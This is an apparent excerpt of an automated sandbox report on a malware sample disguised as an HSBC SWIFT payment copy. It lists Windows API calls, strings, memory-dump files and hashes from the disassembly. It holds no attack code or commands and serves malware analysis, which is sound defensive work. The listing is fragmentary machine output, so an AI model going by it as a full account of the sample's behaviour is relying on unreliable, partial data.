                                                                                                                                  • Part of subcall function 0077C816: VariantInit.OLEAUT32(00000000), ref: 0077C882
                                                                                                                                  • Part of subcall function 0077C816: VariantCopy.OLEAUT32(00000000,?), ref: 0077C88C
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0077C556
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                                • String ID: d}}
                                                                                                                                • API String ID: 2932060187-79343828
                                                                                                                                • Opcode ID: 73ea7cc17b19c8777b486cbde763d63de049a262c2921480d8a4ffe7da84786f
                                                                                                                                • Instruction ID: 776421ddc41248e48063515827a872e28f77e710f9ca454e97c89e423b82eab1
                                                                                                                                • Opcode Fuzzy Hash: 73ea7cc17b19c8777b486cbde763d63de049a262c2921480d8a4ffe7da84786f
                                                                                                                                • Instruction Fuzzy Hash: 88111E719007089FCB10DFAAD88489AF7F8FF18350B50862FE58AD7611E775AA44CF90
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                                • String ID: #32770
                                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                                • Opcode ID: 71e611f0c3320fd4d7eea13eccdb1d22d6a5b0129120f36f52b8c3a41e2cda4f
                                                                                                                                • Instruction ID: 13348278247f882e837cfdaf558a959e0d48122601f1189fde335a238934bb1d
                                                                                                                                • Opcode Fuzzy Hash: 71e611f0c3320fd4d7eea13eccdb1d22d6a5b0129120f36f52b8c3a41e2cda4f
                                                                                                                                • Instruction Fuzzy Hash: DCE068326002282BE320ABA9AC49FA7F7BCEB95B70F00002BFD04D3040DA649A1187E0
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0075B314: _memset.LIBCMT ref: 0075B321
                                                                                                                                  • Part of subcall function 00740940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0075B2F0,?,?,?,0072100A), ref: 00740945
                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0072100A), ref: 0075B2F4
                                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0072100A), ref: 0075B303
                                                                                                                                Strings
                                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0075B2FE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                • API String ID: 3158253471-631824599
                                                                                                                                • Opcode ID: 85d62b273589c8dd4f5ad9b9c722935b3dc53009663a350b624afa2a671318a3
                                                                                                                                • Instruction ID: f47f5b126c4ed4b9b15e82e40918601c0a48e131faa7ca4b2ca7cfd240437820
                                                                                                                                • Opcode Fuzzy Hash: 85d62b273589c8dd4f5ad9b9c722935b3dc53009663a350b624afa2a671318a3
                                                                                                                                • Instruction Fuzzy Hash: 91E0C9B02007518AD7209F68E5087967BE8FF44715F008A6DE856D6652E7FCA449CBA1
                                                                                                                                APIs
                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00777C82
                                                                                                                                  • Part of subcall function 00743358: _doexit.LIBCMT ref: 00743362
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message_doexit
                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                                • Opcode ID: dec2c576fad20a076700a7df9220bb983fbc71d0cc14d4efcf3366429354b79b
                                                                                                                                • Instruction ID: 716f79ec58966392be617fa0599464ad71792dc5f9e4cf816298a17c89fda256
                                                                                                                                • Opcode Fuzzy Hash: dec2c576fad20a076700a7df9220bb983fbc71d0cc14d4efcf3366429354b79b
                                                                                                                                • Instruction Fuzzy Hash: 8DD05B323C432876D11532B56D0BFCA7D484F15B52F044866FB0C595D38AED459081F9
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00761775
                                                                                                                                  • Part of subcall function 0079BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0076195E,?), ref: 0079BFFE
                                                                                                                                  • Part of subcall function 0079BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0079C010
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0076196D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                • String ID: WIN_XPe
                                                                                                                                • API String ID: 582185067-3257408948
                                                                                                                                • Opcode ID: 3edf571bde32716c041d56d295323564bd27dbb1b7c655b4a2638859bc2795dd
                                                                                                                                • Instruction ID: 1e6873b4c8943e3a21fe24ab3881b3f248318f06f3413ea793dd856ae03ca168
                                                                                                                                • Opcode Fuzzy Hash: 3edf571bde32716c041d56d295323564bd27dbb1b7c655b4a2638859bc2795dd
                                                                                                                                • Instruction Fuzzy Hash: 08F0E571801109DFDB15DBA1DAC8AECBBF8BB58301FA84095E503A70A0D7799F84DF64
                                                                                                                                APIs
                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A596E
                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007A5981
                                                                                                                                  • Part of subcall function 00785244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                • Opcode ID: ca18f7154e6c89f4765eabcba2d4f5f5231103ac3431289f8a83295d0961eef0
                                                                                                                                • Instruction ID: c8f2b1a32817fa13f18e120796a2d4ea8f4a8afdb1e3571235bb788be13dce67
                                                                                                                                • Opcode Fuzzy Hash: ca18f7154e6c89f4765eabcba2d4f5f5231103ac3431289f8a83295d0961eef0
                                                                                                                                • Instruction Fuzzy Hash: E9D0C975784311B6E6A4BBB0AC4FF966A64BB41B50F004825F24AAA1D0C9E89810C668
                                                                                                                                APIs
                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A59AE
                                                                                                                                • PostMessageW.USER32(00000000), ref: 007A59B5
                                                                                                                                  • Part of subcall function 00785244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                • Opcode ID: d60f2e7a7c3a78227c365101c86a3e9308eb4dc25d80b66055472354e549962f
                                                                                                                                • Instruction ID: 9a0eb6bb43ab48a300b7ed1e21880a2d231199d1bfe1b3c66b731766666a5889
                                                                                                                                • Opcode Fuzzy Hash: d60f2e7a7c3a78227c365101c86a3e9308eb4dc25d80b66055472354e549962f
                                                                                                                                • Instruction Fuzzy Hash: 28D0C9717C0311BAE6A4BBB0AC4FF966664BB45B50F004825F246AA1D0C9E8A810C668